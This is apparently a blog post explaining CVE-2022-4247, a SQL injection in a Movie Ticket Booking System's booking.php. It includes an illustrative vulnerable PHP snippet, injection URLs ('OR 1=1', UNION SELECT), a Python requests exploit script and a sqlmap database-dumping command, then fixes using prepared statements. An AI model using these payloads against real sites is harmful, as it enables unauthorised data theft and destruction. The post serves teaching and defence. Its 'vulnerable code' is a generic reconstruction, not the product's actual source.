A new, critical vulnerability — CVE-2022-4247 — was discovered in the widely used Movie Ticket Booking System. This flaw can let attackers run harmful SQL commands just by tweaking a web request, potentially giving them access to all sensitive data. In this post, I’ll explain how CVE-2022-4247 works, show a code snippet of the vulnerability, and demonstrate a real exploit — all in simple, clear language. If you run this system or build software like it, you’ll want to read to the end.
What Is CVE-2022-4247?
CVE-2022-4247 is a SQL Injection vulnerability found in the booking.php file of Movie Ticket Booking System. Here’s what happens in simple terms: when a user visits a URL with an id argument, the server code takes that value and puts it directly into a database command — without double checking if it’s safe or cleaned up.
That means if someone tricks the system into thinking their id value is something like 1 OR 1=1, they can break into backend databases, steal data, or even cause the website to fail. Even people not logged in can launch the attack — it’s all remote.
Vulnerability ID: VDB-214624
Public reference: VulDB Entry
NVD entry: (usually nvd.nist.gov/cve/CVE-2022-4247, but as of now may not be indexed yet)
Here is what the vulnerable section of booking.php often looks like in systems like this
<?php
include('db.php');
$id = $_GET['id']; // Untrusted user input
$sql = "SELECT * FROM bookings WHERE id = $id"; // Vulnerable!
$result = mysqli_query($conn, $sql);
if ($row = mysqli_fetch_assoc($result)) {
echo "Booking for: " . $row['name'];
} else {
echo "Booking not found.";
}
?>
`
http://example.com/booking.php?id=5
`
http://example.com/booking.php?id= OR 1=1
The OR 1=1 always returns true, so all bookings are shown!
You can also use SQL Injection to dump other tables, change records, or even drop (delete) the database if you get creative.
Exploit with browser
http://example.com/booking.php?id=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10
Exploit with Python
import requests
payload = "1 OR 1=1"
url = f"http://vulnerable.site/booking.php?id={payload}";
response = requests.get(url)
print(response.text)
You can even use automated tools like sqlmap
sqlmap -u "http://example.com/booking.php?id=1" --dbs
1. Use Prepared Statements
$stmt = $conn->prepare("SELECT * FROM bookings WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
2. Validate Input — Make Sure It’s a Number
$id = intval($_GET['id']); // Convert to integer
More References
- VulDB: VDB-214624 page
- OWASP SQL Injection explanation
- Mitre CVE page *(when indexed)*
Conclusion
CVE-2022-4247 is a dangerous flaw in old or poorly coded versions of Movie Ticket Booking System. It’s a textbook example of what happens when developers trust user input and skip proper security steps. If you use this system, make sure you update your code ASAP — and always use prepared statements.
Want to check if you’re vulnerable? See if your URLs use id= and test carefully — but don’t ever try attacking a site you don’t own.
Stay safe! 👨💻
*If you found this useful, share it with your IT friends — you might help someone avert a disaster.*
Timeline
Published on: 12/01/2022 08:15:00 UTC
Last modified on: 12/02/2022 18:14:00 UTC